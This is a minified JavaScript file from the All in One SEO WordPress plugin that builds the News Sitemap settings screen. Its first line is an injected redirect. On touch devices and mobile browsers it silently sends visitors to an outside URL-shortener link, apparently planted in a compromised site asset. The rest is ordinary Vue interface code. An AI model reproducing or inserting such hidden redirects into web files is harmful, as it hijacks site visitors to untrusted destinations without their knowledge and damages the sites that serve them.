(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as x}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as u,i as b,aq as m,Q as g,R as i,j as c,ae as l,U as a,a0 as s,v as e,M as f}from"./vendor-vue-ui.232c7c36.js";import{c as h,G as B,h as G}from"./app-core.c8323d51.js";import{_ as n,a as A}from"./vendor-other.39e59221.js";import{C as M}from"./Blur.dea2904a.js";import{C as R}from"./SettingsRow.7bec777f.js";import{S as U}from"./External.071520c9.js";import{B as D}from"./Checkbox.a5d4289c.js";import{C as I}from"./Card.9ee06a3e.js";import{C as H}from"./ProBadge.7b829f47.js";import{C as O}from"./Index.e286637f.js";import{R as V}from"./RequiredPlans.e5238a4f.js";import{u as E}from"./AddonConditions.018c1d67.js";import"./vendor-lodash.03129cfe.js";import"./Row.2ef96b1a.js";import"./Checkmark.51de2d05.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Button.3cec2279.js";import"./Pencil.683baab8.js";const z={};function q(_,p){return u(),b("div")}const Y=x(z,[["render",q]]),o="all-in-one-seo-pack",N=()=>({strings:{news:n("News Sitemap",o),setPublicationName:n("Set Publication Name",o),publicationName:n("Publication Name",o),postTypes:n("Post Types",o),exclude:n("Exclude Pages/Posts",o),description:n("The Google News Sitemap lets you control which content you submit to Google News and only contains articles that were published in the last 48 hours.",o),extendedDescription:n("In order to submit a News Sitemap to Google, you must have added your site to Google’s Publisher Center and had it approved.",o),enableSitemap:n("Enable Sitemap",o),openSitemap:n("Open News Sitemap",o),noIndexDisplayed:n("Noindexed content will not be displayed in your sitemap.",o),doYou404:n("Do you get a blank sitemap or 404 error?",o),ctaButtonText:n("Unlock News Sitemaps",o),ctaHeader:A(n("News Sitemaps is a %1$s Feature",o),"PRO"),includeAllPostTypes:n("Include All Post Types",o),selectPostTypes:n("Select which Post Types appear in your sitemap.",o)}}),j={setup(){const{strings:_}=N();return{strings:_,GLOBAL_STRINGS:B,links:h}},components:{CoreBlur:M,CoreSettingsRow:R,SvgExternal:U,BaseCheckbox:D}},F={class:"aioseo-settings-row aioseo-section-description"},Q=["innerHTML"],J={class:"aioseo-sitemap-preview"},K={class:"aioseo-description"},W=["innerHTML"],X={class:"aioseo-description"},Z=["innerHTML"];function $(_,p,r,t,S,T){const w=m("base-toggle"),d=m("core-settings-row"),k=m("svg-external"),L=m("base-button"),P=m("base-input"),C=m("base-checkbox"),v=m("core-blur");return u(),g(v,null,{default:i(()=>[c("div",F,[l(a(t.strings.description)+" "+a(t.strings.extendedDescription)+" ",1),c("span",{innerHTML:t.links.getDocLink(t.GLOBAL_STRINGS.learnMore,"newsSitemaps",!0)},null,8,Q)]),s(d,{name:t.strings.enableSitemap},{content:i(()=>[s(w,{modelValue:!0})]),_:1},8,["name"]),s(d,{name:t.GLOBAL_STRINGS.preview},{content:i(()=>[c("div",J,[s(L,{size:"medium",type:"blue"},{default:i(()=>[s(k),l(" "+a(t.strings.openSitemap),1)]),_:1})]),c("div",K,[l(a(t.strings.noIndexDisplayed)+" ",1),p[0]||(p[0]=c("br",null,null,-1)),l(" "+a(t.strings.doYou404)+" ",1),c("span",{innerHTML:t.links.getDocLink(t.GLOBAL_STRINGS.learnMore,"blankSitemap",!0)},null,8,W)])]),_:1},8,["name"]),s(d,{name:t.strings.publicationName,align:""},{content:i(()=>[s(P,{size:"medium"})]),_:1},8,["name"]),s(d,{name:t.strings.postTypes},{content:i(()=>[s(C,{size:"medium"},{default:i(()=>[l(a(t.strings.includeAllPostTypes),1)]),_:1}),c("div",X,[l(a(t.strings.selectPostTypes)+" ",1),c("span",{innerHTML:t.links.getDocLink(t.GLOBAL_STRINGS.learnMore,"selectPostTypesNews",!0)},null,8,Z)])]),_:1},8,["name"])]),_:1})}const ee=x(j,[["render",$]]),te={class:"aioseo-news-sitemap-lite"},y={__name:"NewsSitemap",setup(_){const p=G(),{strings:r}=N();return(t,S)=>(u(),b("div",te,[s(e(I),{slug:"newsSitemap",noSlide:!0},{header:i(()=>[c("span",null,a(e(r).news),1),s(e(H))]),default:i(()=>[s(e(ee)),s(e(O),{"feature-list":[e(r).setPublicationName,e(r).exclude],"cta-link":e(h).getPricingUrl("news-sitemap","news-sitemap-upsell",null,"liteUpgrade"),"button-text":e(r).ctaButtonText,"learn-more-link":e(h).getUpsellUrl("news-sitemap",null,"liteUpgrade"),"hide-bonus":!e(p).isUnlicensed},{"header-text":i(()=>[l(a(e(r).ctaHeader),1)]),description:i(()=>[s(e(V),{addon:"aioseo-news-sitemap"}),l(" "+a(e(r).description),1)]),_:1},8,["feature-list","cta-link","button-text","learn-more-link","hide-bonus"])]),_:1})]))}},ne={class:"aioseo-news-sitemap"},Pe={__name:"NewsSitemap",setup(_){const{shouldShowActivate:p,shouldShowLite:r,shouldShowMain:t,shouldShowUpdate:S}=E({addonSlug:"aioseo-news-sitemap"});return(T,w)=>(u(),b("div",ne,[e(t)?(u(),g(e(y),{key:0})):f("",!0),e(S)||e(p)?(u(),g(e(Y),{key:1})):f("",!0),e(r)?(u(),g(e(y),{key:2})):f("",!0)]))}};export{Pe as default};
